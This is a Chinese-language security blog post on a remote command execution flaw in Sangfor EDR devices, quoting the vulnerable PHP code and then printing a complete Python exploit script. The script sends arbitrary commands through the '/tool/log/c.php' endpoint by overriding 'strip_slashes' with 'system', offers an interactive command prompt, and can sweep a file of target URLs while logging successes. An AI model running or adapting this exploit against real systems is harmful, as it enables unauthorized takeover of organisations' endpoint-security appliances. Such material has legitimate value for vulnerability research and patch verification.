深信服edr设备远程命令执行漏洞
安全
2021-03-07 16:21
声明:该文章由作者(孔秀)发表,转载此文章须经作者同意并请附上出处(0XUCN)及本页链接。。
RCE
echo "<p><b>Log Helper</b></p>"; $show_form($_REQUEST);
跟入show_form
/** * 显示表单 * @param array $params 请求参数 * @return */ $show_form = function($params) use(&$strip_slashes, &$show_input) { extract($params); $host = isset($host) ? $strip_slashes($host) : "127.0.0.1";
exp:
# -*- coding: utf-8 -*- # @Time : 2020/8/17 # @Author : Angel # @File : edr.py # 感谢大佬提供Command execute部分代码 import requests import re import urllib3 import sys urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def hello(): print ("SangFor EDR remote command code exploit") print ("") print ("Angel 20200817") print ("") print ("Github: https://github.com/A2gel/sangfor-edr-exploit") print ("") print ("Command: python edr.py url http://10.10.10.0/") print ("Command: python edr.py file 1.txt whoami") def readFile(filename): list=[] keywords = open('./'+filename, 'r') line = keywords.readline().strip('\n') while (line): list.append(line) line = keywords.readline().strip('\n') keywords.close() return list def log(name,value): save = file(str(name)+".txt", "a+") save.write(str(value)+"\n") save.close() def rce(host,command): headers={ 'Connection': 'close', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } url="{}/tool/log/c.php?strip_slashes=system&host={}".format(host,command) print url try: response = requests.get(url,verify=False,headers=headers,timeout=3) response.raise_for_status() response.encoding = "utf-8" #print response.text res=re.findall(r'<b>Log Helper</b></p>(.+?)<pre><form',response.text,re.S) response.close() print(res[0]) return "+" except: print('failed') return "-" if __name__ == '__main__': if len(sys.argv) < 2: hello() else: if sys.argv[1] == "url": while 1: command = raw_input("Command> ") if command: print ("Try %s"%sys.argv[2]) rce(sys.argv[2],command) else: print ("Please input Command") command = "" elif sys.argv[1] == "file": if (sys.argv) < 3: print "Command: python edr.py file url.txt" else: for i in readFile(sys.argv[2]): print ("Try %s"%i) if rce(i,sys.argv[3]) == "+": log("success",sys.argv[3]) else: log("error",sys.argv[3]) else: hello()
参考链接:
https://www.cnblogs.com/potatsoSec/p/13520546.html
[超站]友情链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
排名
热点
搜索指数
- 1 习近平主席拉美之行高光时刻 7985135
- 2 家暴幸存后的580天 7930014
- 3 中国房价有望在2026年前后止跌回稳 7802525
- 4 特色文旅释放消费“新”热潮 7702682
- 5 尾随小女孩的男子已被抓获 7643679
- 6 余承东官宣Mate70新功能 7560351
- 7 机场偶遇黄圣依杨子 网友:没离婚啊? 7439283
- 8 2.8亿!南京富家千金买下父亲公司股份 7353549
- 9 微信群里的这种通知或为木马病毒 7205163
- 10 泰山因降雪暂停开放 7126185